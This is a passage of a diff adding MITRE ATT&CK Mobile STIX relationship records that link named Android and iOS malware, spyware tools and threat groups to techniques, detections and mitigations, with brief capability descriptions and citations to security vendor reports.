"https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:31:30.741Z", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) can collect SMS messages.(Citation: Cybereason FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c1453cd9-44bb-4dd2-bdbd-eb06a239d38c", + "created": "2022-04-06T15:52:07.805Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T15:52:07.805Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--d916f176-a1ca-4a78-9fdd-4058bc28162e", + "target_ref": "attack-pattern--c6a146ae-9c63-4606-97ff-e261e76e8380", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--17558571-7352-470b-b728-0511fb3f699d", + "type": "relationship", + "created": "2019-10-18T15:51:48.484Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2020-06-24T15:02:13.534Z", + "description": "Users should be warned against granting access to accessibility features, and to carefully scrutinize applications that request this dangerous permission.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--204e30ed-5e69-400b-a814-b77e10596865", + "created": "2022-04-06T15:50:42.481Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T15:50:42.481Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--f58cd69a-e548-478b-9248-8a9af881dc34", + "target_ref": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--75472bf8-c7fd-4fc7-a11e-74189bc23b78", + "type": "relationship", + "created": "2019-10-10T15:17:00.972Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "FlexiSpy. (n.d.). FlexiSpy Monitoring Features. Retrieved September 4, 2019.", + "url": "https://www.flexispy.com/en/features-overview.htm", + "source_name": "FlexiSpy-Features" + } + ], + "modified": "2019-10-14T18:08:28.666Z", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) can monitor device photos and can also access browser history and bookmarks.(Citation: FlexiSpy-Features)", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--022e941f-30c3-45a9-9f6f-36e704b80060", + "created": "2020-04-24T17:46:31.574Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020.", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:44:13.361Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) registers for the `SCREEN_ON` and `SMS_DELIVER` intents to perform actions when the device is unlocked and when the device receives an SMS message.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--fdf06a0b-08d2-4cac-9d49-b3f1454ec4ea", + "created": "2022-03-30T19:32:43.015Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Attestation can detect rooted devices. Mobile security software can then use this information and take appropriate mitigation action. Attestation can detect rooted devices.", + "modified": "2022-03-30T19:32:43.015Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "target_ref": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5c746ac8-4034-4ae3-98c3-66d89f5a6d6a", + "created": "2020-07-27T14:14:56.996Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Google Security Zen", + "description": "Siewierski, L. (2019, January 11). PHA Family Highlights: Zen and its cousins . Retrieved July 27, 2020.", + "url": "https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:19:00.199Z", + "description": "[Zen](https://attack.mitre.org/software/S0494) can inject code into the Setup Wizard at runtime to extract CAPTCHA images. [Zen](https://attack.mitre.org/software/S0494) can inject code into the `libc` of running processes to infect them with the malware.(Citation: Google Security Zen)", + "relationship_type": "uses", + "source_ref": "malware--22faaa56-a8ac-4292-9be6-b571b255ee40", + "target_ref": "attack-pattern--1ff89c1b-7615-4fe8-b9cb-63aaf52e6dee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c1d78c3d-9ed6-4e3f-9cad-b98b5dfb8ebd", + "created": "2023-03-20T15:40:11.819Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:40:11.819Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--bee919a6-c488-49a0-9848-fff19aa2c276", + "type": "relationship", + "created": "2021-09-24T14:47:34.449Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-04T20:08:48.556Z", + "description": "Mobile security products can often detect rooted devices.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433", + "target_ref": "attack-pattern--ccde43e4-78f9-4f32-b401-c081e7db71ea", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--7c6207c7-d738-4a17-8380-595c86574b64", + "type": "relationship", + "created": "2020-09-11T16:22:03.298Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout ViperRAT", + "url": "https://blog.lookout.com/viperrat-mobile-apt", + "description": "M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T16:22:03.298Z", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) can track the device’s location.(Citation: Lookout ViperRAT)", + "relationship_type": "uses", + "source_ref": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3fcd2177-2030-4781-bd19-8b9fa8c6e645", + "type": "relationship", + "created": "2021-02-08T16:36:20.655Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021." + } + ], + "modified": "2021-05-24T13:16:56.410Z", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has included phone call and audio recording capabilities in the malicious apps deployed as part of Operation BULL and Operation ROCK.(Citation: BlackBerry Bahamut)", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d995dfff-e4b2-4e07-8e76-b064354f591a", + "created": "2022-04-01T12:49:32.365Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Calendar access is an uncommonly needed permission, so users should be instructed to use extra scrutiny when granting access to their device calendar. ", + "modified": "2022-04-01T12:49:32.365Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--23cac1d7-27ca-4c78-bfa0-2d6023d21798", + "type": "relationship", + "created": "2020-10-29T19:01:13.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Microsoft MalLockerB", + "url": "https://www.microsoft.com/security/blog/2020/10/08/sophisticated-new-android-malware-marks-the-latest-evolution-of-mobile-ransomware/", + "description": "D. Venkatesan. (2020, October 8). Sophisticated new Android malware marks the latest evolution of mobile ransomware . Retrieved October 29, 2020." + } + ], + "modified": "2020-10-29T19:01:13.854Z", + "description": "[AndroidOS/MalLocker.B](https://attack.mitre.org/software/S0524) has employed both name mangling and meaningless variable names in source. [AndroidOS/MalLocker.B](https://attack.mitre.org/software/S0524) has stored encrypted payload code in the Assets directory, coupled with a custom decryption routine that assembles a .dex file by passing data through Android Intent objects. (Citation: Microsoft MalLockerB)", + "relationship_type": "uses", + "source_ref": "malware--9b86f8c3-33ab-44cf-a66d-c0fd6070e2ce", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--43a62244-29f1-4f7f-bc9f-9b7b8e488b38", + "type": "relationship", + "created": "2020-05-11T16:37:36.616Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. Retrieved April 8, 2020.", + "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html", + "source_name": "ThreatFabric Ginp" + } + ], + "modified": "2020-05-11T16:37:36.616Z", + "description": " [Ginp](https://attack.mitre.org/software/S0423) can inject input to make itself the default SMS handler.(Citation: ThreatFabric Ginp) ", + "relationship_type": "uses", + "source_ref": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "target_ref": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--82a51cc3-7a91-43b0-9147-df5983e52b41", + "created": "2020-12-14T15:02:35.208Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Securelist Asacub", + "description": "T. Shishkova. (2018, August 28). The rise of mobile banker Asacub. Retrieved December 14, 2020.", + "url": "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:08:11.798Z", + "description": "[Asacub](https://attack.mitre.org/software/S0540) has communicated with the C2 using HTTP POST requests.(Citation: Securelist Asacub)", + "relationship_type": "uses", + "source_ref": "malware--a76b837b-93cc-417d-bf28-c47a6a284fa4", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d3e06522-2a30-4d56-801e-9461178b80ce", + "created": "2021-01-05T20:16:20.412Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021.", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:45:54.913Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can hide its icon after launch.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--147d82a6-a61a-41d0-8eef-b6193bdd92d6", + "created": "2022-03-30T15:18:21.256Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T15:18:21.256Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--c5089859-b21f-40a3-8be4-63e381b8b1c0", + "target_ref": "attack-pattern--c6e17ca2-08b5-4379-9786-89bd05241831", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ce8cc50a-f3c9-4a6a-b6be-f3e8bdd293bd", + "type": "relationship", + "created": "2019-07-10T15:35:43.699Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2019-08-09T18:06:11.839Z", + "description": "[Pallas](https://attack.mitre.org/software/S0399) captures audio from the device microphone.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b05668b9-aa06-4191-a4fa-f7e5a7804694", + "type": "relationship", + "created": "2021-01-05T20:16:20.514Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021." + } + ], + "modified": "2021-01-05T20:16:20.514Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can list all hidden files in the `/DCIM/.dat/` directory.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4a936488-526c-40c1-b2d5-490052cb0e73", + "created": "2020-12-31T18:25:05.162Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020.", + "url": "https://www.youtube.com/watch?v=xoNSbm1aX_w" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:22:53.698Z", + "description": "[CHEMISTGAMES](https://attack.mitre.org/software/S0555) can run bash commands.(Citation: CYBERWARCON CHEMISTGAMES)", + "relationship_type": "uses", + "source_ref": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "target_ref": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5619e263-d48c-47a5-ab68-8677fe080a15", + "created": "2022-03-30T14:42:27.821Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T14:42:27.821Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "target_ref": "attack-pattern--d446b9f0-06a9-4a8d-97ee-298cfee84f14", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d54bdaff-8eb8-4a02-9f64-bc33c892e9d1", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Xiao-ZergHelper", + "description": "Claud Xiao. (2016, February 21). Pirated iOS App Store’s Client Successfully Evaded Apple iOS Code Review. Retrieved December 12, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/pirated-ios-app-stores-client-successfully-evaded-apple-ios-code-review/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[ZergHelper](https://attack.mitre.org/software/S0287) attempts to extend its capabilities via dynamic updating of its code.(Citation: Xiao-ZergHelper)", + "relationship_type": "uses", + "source_ref": "malware--3c3b55a6-c3e9-4043-8aae-283fe96220c0", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d4a5a902-231e-4878-ad5b-39620498b018", + "type": "relationship", + "created": "2019-09-04T14:28:15.941Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "source_name": "Lookout-Monokle" + } + ], + "modified": "2019-09-04T14:32:12.589Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can record audio from the device's microphone and can record phone calls, specifying the output audio quality.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d7ca70d4-2006-4252-b243-e52be760e24d", + "created": "2022-04-01T13:26:39.773Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Access to SMS messages is an uncommonly needed permission, so users should be instructed to use extra scrutiny when granting access to their SMS messages. ", + "modified": "2022-04-01T13:26:39.773Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--980c49f8-d991-4e1f-8feb-6173e3dfca1f", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-EnterpriseApps", + "description": "Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. Retrieved December 19, 2016.", + "url": "https://blog.lookout.com/blog/2016/05/25/spoofed-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:29:18.098Z", + "description": "[AndroRAT](https://attack.mitre.org/software/S0292) captures SMS messages.(Citation: Lookout-EnterpriseApps)", + "relationship_type": "uses", + "source_ref": "malware--a3dad2be-ce62-4440-953b-00fbce7aba93", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--020f79c6-d5f8-49eb-beee-e716e1fa4e80", + "type": "relationship", + "created": "2020-07-20T13:49:03.692Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro-XLoader-FakeSpy", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/", + "description": "Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 2020." + } + ], + "modified": "2020-09-24T15:12:24.191Z", + "description": "[XLoader for Android](https://attack.mitre.org/software/S0318) collects the device’s Android ID and serial number.(Citation: TrendMicro-XLoader-FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--2740eaf6-2db2-4a40-a63f-f5b166c7059c", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--77efa84c-5ef0-4554-b774-2dbfcca74087", + "type": "relationship", + "created": "2020-10-29T19:20:58.116Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "WeLiveSecurity AdDisplayAshas", + "url": "https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/", + "description": "L. Stefanko. (2019, October 24). Tracking down the developer of Android adware affecting millions of users. Retrieved October 29, 2020." + } + ], + "modified": "2020-10-29T19:20:58.116Z", + "description": "[Android/AdDisplay.Ashas](https://attack.mitre.org/software/S0525) has checked to see how many apps are installed, and specifically if Facebook or FB Messenger are installed.(Citation: WeLiveSecurity AdDisplayAshas)", + "relationship_type": "uses", + "source_ref": "malware--f7e7b736-2cff-4c2a-9232-352cd383463a", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2e7f8995-93ae-41bb-9baf-53178341d93e", + "created": "2021-02-08T16:36:20.630Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021.", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:06:00.885Z", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has deployed anti-analysis capabilities during their Operation BULL campaign.(Citation: BlackBerry Bahamut)", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": 